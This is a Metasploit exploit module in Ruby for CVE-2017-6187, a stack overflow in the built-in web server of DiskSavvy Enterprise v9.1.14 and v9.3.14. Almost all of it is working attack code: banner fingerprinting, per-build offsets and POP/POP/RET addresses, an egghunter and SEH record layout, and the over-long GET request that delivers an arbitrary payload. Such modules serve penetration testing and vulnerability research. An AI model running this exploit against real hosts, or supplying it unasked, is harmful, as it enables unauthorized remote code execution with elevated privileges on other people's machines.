Path: blob/master/modules/exploits/windows/http/disksavvy_get_bof.rb
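##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# SEH-based stack overflow in the DiskSavvy Enterprise built-in web server
# (CVE-2017-6187): an over-long request path in an HTTP GET overwrites the
# exception handler. Control is regained through a POP/POP/RET in libspp.dll
# and an egghunter that locates the real payload earlier in the same buffer.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DiskSavvy Enterprise GET Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability
        in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,
        caused by improper bounds checking of the request path in HTTP GET
        requests sent to the built-in web server. This module has been
        tested successfully on Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'vportal',      # Vulnerability discovery and PoC
          'Gabor Seljan'  # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2017-6187'],
          ['EDB', '40869']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          # The payload travels inside the GET request path, so NUL and the
          # HTTP request-line delimiters (TAB, LF, CR, SPACE) must not appear.
          'BadChars' => "\x00\x09\x0a\x0d\x20",
          'Space'    => 500
        },
      'Targets'        =>
        [
          # Offset = bytes of filler between the egg and the SEH record;
          # Ret = POP # POP # RET gadget in libspp.dll for that build.
          [ 'Automatic Targeting', { 'auto' => true } ],
          [ 'DiskSavvy Enterprise v9.1.14', { 'Offset' => 542,  'Ret' => 0x101142c0 } ],
          [ 'DiskSavvy Enterprise v9.3.14', { 'Offset' => 2478, 'Ret' => 0x101142ff } ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2016-12-01',
      'DefaultTarget'  => 0))
  end

  # Fingerprint the target from the banner on the web root.
  #
  # Returns CheckCode::Unknown when no usable HTTP response arrives,
  # ::Safe when the DiskSavvy banner is absent, ::Detected for a DiskSavvy
  # build other than the two known-vulnerable ones, and ::Appears for
  # v9.1.14 / v9.3.14.
  def check
    res = fetch_web_root

    unless res && res.code == 200
      # Distinguish a dead/filtered port from a live server answering with a
      # non-200 status; the old message blamed a "timeout" in both cases.
      if res
        vprint_error("Unexpected HTTP status #{res.code} from the web root")
      else
        vprint_error('Unable to determine due to a HTTP connection timeout')
      end
      return Exploit::CheckCode::Unknown
    end

    version = banner_version(res)
    return Exploit::CheckCode::Safe unless version

    vprint_status("Version detected: #{version}")
    return Exploit::CheckCode::Appears if version =~ /9\.(1|3)\.14/

    Exploit::CheckCode::Detected
  end

  # Build the malicious request path and send it.
  #
  # Buffer layout, from the start of the path:
  #   [10 NOPs][egg: tag + encoded payload][filler up to Offset]
  #   [SEH record (nSEH jump + Ret)][8 NOPs][egghunter][4500 bytes filler]
  # The handler overwrite lands on the POP/POP/RET, which returns into the
  # nSEH short jump; that jump reaches the NOPs/egghunter, and the hunter
  # scans memory for the tagged egg placed at the front of the buffer.
  def exploit
    mytarget = target

    if target['auto']
      print_status('Automatically detecting the target...')
      mytarget = detect_target
      # Refuse to fire blind: an Offset/Ret pair for the wrong build will
      # most likely just crash the DiskSavvy service instead of gaining
      # execution, so a missed fingerprint is treated as fatal.
      fail_with(Failure::NoTarget, 'No matching target') unless mytarget
      print_status("Selected target: #{mytarget.name}")
    end

    eggoptions = {
      checksum: true,
      # A random, badchar-free tag so a stale egg from a previous attempt
      # in the process's memory cannot be mistaken for this one.
      eggtag: rand_text_alpha(4, payload_badchars)
    }

    hunter, egg = generate_egghunter(
      payload.encoded,
      payload_badchars,
      eggoptions
    )

    sploit = make_nops(10)
    sploit << egg
    # Pad so the SEH record sits exactly at the overwrite point for this build.
    sploit << rand_text_alpha(mytarget['Offset'] - egg.length)
    sploit << generate_seh_record(mytarget.ret)
    sploit << make_nops(8)
    sploit << hunter
    # Trailing filler presumably keeps the overwrite going past the end of the
    # stack frame so the fault that invokes the SEH chain is actually raised.
    sploit << rand_text_alpha(4500)

    print_status('Sending malicious request...')

    # No 'encode' option is passed, so the path is expected to go out verbatim.
    send_request_cgi(
      'method' => 'GET',
      'uri'    => sploit
    )
  end

  private

  # GET the web root; returns the response, or nil when nothing came back.
  def fetch_web_root
    send_request_cgi(
      'method' => 'GET',
      'uri'    => '/'
    )
  end

  # Extract the "Disk Savvy Enterprise v..." banner from a response body,
  # or nil when the product banner is not present.
  def banner_version(res)
    res.body[/Disk Savvy Enterprise v[^<]*/]
  end

  # Map the web-root banner to one of the concrete targets.
  # Returns nil when the server does not answer 200 or the banner matches
  # neither known-vulnerable version.
  def detect_target
    res = fetch_web_root
    return nil unless res && res.code == 200

    case res.body
    when /Disk Savvy Enterprise v9\.1\.14/ then targets[1]
    when /Disk Savvy Enterprise v9\.3\.14/ then targets[2]
    end
  end
end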